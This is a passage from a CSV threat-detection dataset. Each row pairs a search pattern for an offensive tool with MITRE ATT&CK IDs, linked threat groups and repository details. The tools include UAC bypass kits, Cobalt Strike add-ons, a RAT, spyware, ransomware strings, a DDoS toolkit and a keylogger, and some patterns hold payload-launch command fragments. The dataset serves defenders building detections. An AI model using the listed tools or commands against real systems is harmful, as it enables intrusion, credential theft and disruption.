Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","61782" "*UACBypassTest.txt*",".{0,1000}UACBypassTest\.txt.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","61783" "*UACEnum.SCR*",".{0,1000}UACEnum\.SCR.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","61784" "*uacm4gic*",".{0,1000}uacm4gic.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","61785" "*UACME-master*",".{0,1000}UACME\-master.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense 
Evasion","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","61786" "*uac-schtasks *",".{0,1000}uac\-schtasks\s.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","61787" "*uac-schtasks*",".{0,1000}uac\-schtasks.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary 
Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","61788" "*uac-silentcleanup*",".{0,1000}uac\-silentcleanup.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - 
T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","N/A","10","10","192","31","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z","61789" "*uac-token-duplication*",".{0,1000}uac\-token\-duplication.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 
- T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","61790" "*UACTokenManipulationManager.cs*",".{0,1000}UACTokenManipulationManager\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","61791" "*uaf2john.*",".{0,1000}uaf2john\..{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","61792" "*uberfile --lhost* --lport * --target-os * --downloader 
*",".{0,1000}uberfile\s\-\-lhost.{0,1000}\s\-\-lport\s.{0,1000}\s\-\-target\-os\s.{0,1000}\s\-\-downloader\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","61793" "*ubiq-eu1.picopool.org*",".{0,1000}ubiq\-eu1\.picopool\.org.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","1","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","61794" "*ubuntu:dnscrypt-msi*",".{0,1000}ubuntu\:dnscrypt\-msi.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","61795" "*udmp-parser-main*",".{0,1000}udmp\-parser\-main.{0,1000}","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","1","N/A","N/A","6","3","202","23","2024-11-20T15:58:21Z","2022-01-30T18:56:21Z","61797" "*UDVC-Server.exe -c * -i 127.0.0.1*",".{0,1000}UDVC\-Server\.exe\s\-c\s.{0,1000}\s\-i\s127\.0\.0\.1.{0,1000}","offensive_tool_keyword","UniversalDVC","run an executable (UDVC-Server.exe) that sets up a communication channel for redirecting an SSF port using a DVC server. 
This can be seen as a form of proxy to evade detection or bypass network restrictions.","T1090","TA0005","N/A","N/A","Defense Evasion","https://github.com/earthquake/UniversalDVC","1","0","N/A","N/A","N/A","3","253","55","2020-12-07T21:02:23Z","2018-03-09T10:44:29Z","61798" "*UFONet*",".{0,1000}UFONet.{0,1000}","offensive_tool_keyword","UFONet","UFONet - is a free software. P2P and cryptographic -disruptive toolkit- that allows to perform DoS and DDoS attacks. on the Layer 7 (APP/HTTP) through the exploitation of Open Redirect vectors on third-party websites to act as a botnet and on the Layer3 (Network) abusing the protocol.","T1498 - T1499 - T1496 - T1497 - T1497","TA0040 - TA0041","N/A","N/A","DDOS","https://github.com/epsylon/ufonet","1","0","#P2P","N/A","N/A","10","2321","622","2024-08-23T02:21:33Z","2013-06-18T18:11:25Z","61799" "*UFR5cGUgQW5kIFBPcHRpb25zIFRvbyBsb25nIQ==*",".{0,1000}UFR5cGUgQW5kIFBPcHRpb25zIFRvbyBsb25nIQ\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","#base64","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","61800" "*UGF5bG9hZCBOYW1lLCBlLmcuIHdpbmRvd3MvbWV0ZXJwcmV0ZXIvcmV2ZXJzZV90Y3A=*",".{0,1000}UGF5bG9hZCBOYW1lLCBlLmcuIHdpbmRvd3MvbWV0ZXJwcmV0ZXIvcmV2ZXJzZV90Y3A\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","#base64","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","61801" "*UGF5bG9hZCBvcHRpb25zLCBlLmcuIExIT1NUPTEuMS4xLjEsTFBPUlQ9ODg2Ng==*",".{0,1000}UGF5bG9hZCBvcHRpb25zLCBlLmcuIExIT1NUPTEuMS4xLjEsTFBPUlQ9ODg2Ng\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","#base64","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","61802" "*uhttpsharp.*",".{0,1000}uhttpsharp\..{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. 
The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","N/A","10","10","291","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z","61803" "*ui\sAINT.java*",".{0,1000}ui\\sAINT\.java.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - 
TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","61805" "*uiredn4njfsa4234bafb32ygjdawfvs.frascuft.com*",".{0,1000}uiredn4njfsa4234bafb32ygjdawfvs\.frascuft\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","61806" "*UklGRjT7DwBXQVZFZm10IBAAAAABAAEAgD4AAAB9AAACABAAZGF0YRD7DwD*",".{0,1000}UklGRjT7DwBXQVZFZm10IBAAAAABAAEAgD4AAAB9AAACABAAZGF0YRD7DwD.{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","0","N/A","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","61807" "*uknowsec/CreateService*",".{0,1000}uknowsec\/CreateService.{0,1000}","offensive_tool_keyword","CreateService","Creating a persistent service","T1543.003 - T1547.001 - T1050","TA0003","N/A","N/A","Persistence","https://github.com/uknowsec/CreateService","1","1","N/A","N/A","4","2","105","27","2021-04-26T06:43:12Z","2020-09-23T05:03:52Z","61808" "*uknowsec/JuicyPotato*",".{0,1000}uknowsec\/JuicyPotato.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","1","N/A","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","61809" "*uknowsec/keylogger*",".{0,1000}uknowsec\/keylogger.{0,1000}","offensive_tool_keyword","keylogger","Keyboard recording","T1056.001","TA0006 - 
TA0009","N/A","N/A","Collection","https://github.com/uknowsec/keylogger","1","1","N/A","N/A","9","2","140","35","2021-05-19T08:33:58Z","2020-11-10T07:15:50Z","61810" "*uknowsec/SharpAVKB*",".{0,1000}uknowsec\/SharpAVKB.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - T1518 - T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","1","N/A","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","61811" "*uknowsec/SharpDecryptPwd*",".{0,1000}uknowsec\/SharpDecryptPwd.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","N/A","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","61812" "*uknowsec/SharpEventLog*",".{0,1000}uknowsec\/SharpEventLog.{0,1000}","offensive_tool_keyword","SharpEventLog","reads all computer information related to successful (4624) or failed (4625) logins on the local machine to quickly identify operations and maintenance personnel during internal network penetration","T1078 - T1087.001","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpEventLog","1","1","N/A","N/A","4","3","205","34","2019-10-15T06:26:52Z","2019-10-15T06:14:32Z","61813" "*uknowsec/TailorScan*",".{0,1000}uknowsec\/TailorScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","N/A","10","10","279","48","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z","61814" "*UlBDIFNlcnZlciBIb3N0*",".{0,1000}UlBDIFNlcnZlciBIb3N0.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","61816" "*UlBDIFNlcnZlciBQb3J0*",".{0,1000}UlBDIFNlcnZlciBQb3J0.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","61817" "*Ullaakut/Gorsair*",".{0,1000}Ullaakut\/Gorsair.{0,1000}","offensive_tool_keyword","Gorsair","Gorsair hacks its way into remote docker containers that expose their APIs","T1552","TA0006","N/A","N/A","Exploitation tool","https://github.com/Ullaakut/Gorsair","1","1","N/A","N/A","N/A","9","851","70","2023-12-19T18:44:32Z","2018-08-02T16:49:14Z","61818" 